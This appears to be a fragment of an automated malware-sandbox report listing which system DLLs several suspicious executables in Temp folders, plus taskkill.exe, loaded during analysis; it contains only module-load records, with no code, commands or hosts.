Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
